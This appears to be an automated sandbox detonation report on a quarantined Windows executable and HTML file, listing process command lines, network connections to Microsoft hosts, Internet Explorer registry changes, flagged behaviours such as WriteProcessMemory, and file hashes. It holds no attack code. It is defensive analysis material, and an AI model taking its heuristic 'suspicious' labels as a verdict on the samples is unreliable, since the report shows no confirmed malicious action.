C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
memory/1232-0-0x0000000074BBE000-0x0000000074BBF000-memory.dmp
memory/1232-1-0x0000000000E80000-0x0000000000FF0000-memory.dmp
memory/1232-2-0x0000000005EF0000-0x0000000006494000-memory.dmp
memory/1232-4-0x0000000074BB0000-0x0000000075360000-memory.dmp
memory/1232-5-0x0000000074BBE000-0x0000000074BBF000-memory.dmp
memory/1232-6-0x0000000074BB0000-0x0000000075360000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
147s
Max time network
129s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b7b733f7c253b4c826af622749b40c000000000020000000000106600000001000020000000a78f6e4e79be73bda68dc7a0bbbcab2ae9696091a31f40e6d3ec48b844ad70d3000000000e80000000020000200000009358b463a3da7decaa0a7a2fbfe5d5ab6bd2471ee8b6c62a004a45b25ca8228920000000c82b6691e211b6a4b915da5ae8e8e60eb23ec28b6ebb40da7becf503f6b9d2cb4000000095b867fe2143d00788da289e874e39bd640ff0ead930e7b83f57f73352a35d6cadd15e8ff45f29adfeceac3c8ec41a3aefc34c450be7f820a53ba63cf5c7d85e | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{46A542C1-F499-11EF-8250-E62D5E492327} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774343" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007b7b733f7c253b4c826af622749b40c0000000000200000000001066000000010000200000006e0a8e871a77bd04d21e25d95d11d5404b724dfed7a6fcacf4d952fe8d2768eb000000000e8000000002000020000000dc2ee39a8dddc03233169836f0bd67a4958d9b9034051ac722c40562a68653ca90000000d8adefab98fc6f65aedadd831c7445ea3de01278412c6c94a90ff84de03dccc80c1fc87cea7f530d7de7a0cba178b38979b010700bcea374a023ddfc41ab8f1f56150417a9b28daef9ea58640ae8a7678293ab897f5ca7f34c5e6a43ff5bcec8146117ad97b661b32fce959eee805cc03679d74cceb575568fda1e1866d8fba3c7ab9987eca6631219b9094a5d1fe17d40000000314ce11158bb91a8e99445e560e1476e99fe343fd97c5cc6b41e13ff38b8e575e718a37f31e3a377077d27c6984e11ee2a7a216325ca844cec53c55686e8014c | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0e51e1ba688db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2504 wrote to memory of 2300 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2504 wrote to memory of 2300 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2504 wrote to memory of 2300 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2504 wrote to memory of 2300 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\GEFwbK0.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2504 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabDF3B.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\TarE145.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | aad4420223b462cc4e11176a5d9b60bf |
| SHA1 | f98e8abfc0d08c2e385c7e69fc3b1a8b78648a23 |
| SHA256 | 6923c694b900ebdb59154fb5c9d597f64622411127018bdda6908bc3e8295bac |
| SHA512 | 43f3de6cd2f43cc10f47f739c094b2ce8a0f2b586ee2ec7cefcb16ff8b222a3ec7d375ffd84cdb49adc9d4447560984d23896f280d73e3d125122b4569920d3c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 15e13a074abacb2769d0f241c9020d75 |
| SHA1 | d0410a1869f6db1603a6d0458356d64c27e1c912 |
| SHA256 | 1b2fbf8084388e08210ce478d6656d9d2e5c18223c23d6f05bc468dcec415249 |
| SHA512 | 84a5ee4b2c74a31d60e71988c970b3ed75c4fdbc58aeac4bfa0822b66f70176e614a113cada75c751fa804b001142331ec116b97e00a1acd32185636fb055dff |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 383174a7db12d10a5fcf627cc30dde4d |
| SHA1 | a0f41aa6e7b6bb4459a41eea70a2efc4b1a0f14e |
| SHA256 | 742d8b88c82d22956b3f755f4150468f38fc33c729be911d24b41b3a33eb32a8 |
| SHA512 | 1818ec8fc46e1b44c9d74d90da783269e49163ac69e57c26a8336e4f920ab2a1b0d04910451bb6276558c12b224e3483035057e7606c7e6af798e5067eb8759f |
Analysis: behavioral20
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240729-en
Max time kernel
133s
Max time network
127s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008f2ad785859e0c48bc39fdee908bd4c900000000020000000000106600000001000020000000170fe8fad6ab3cc8a19223c139a347fb3d589c0727943e41aa2ce40d68f5339f000000000e8000000002000020000000c76d1044721d79509e6bccfda9be16bb2d13d676f7e803ad9add7694ff67fd6220000000fbc50f55b4bb1ecbc6e1d2146ea615cc482ec4f5df17075113510f83d5f4d1cb400000008446b9037a590a8d156e0815007514c211816ea2c04a845ccc772cfe764c401f4d26005420f27a833cdda8815da9823b6b3f23f13987f7afa7e35310e489649d | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774329" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{469F5EF1-F499-11EF-9816-E6BB832D1259} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
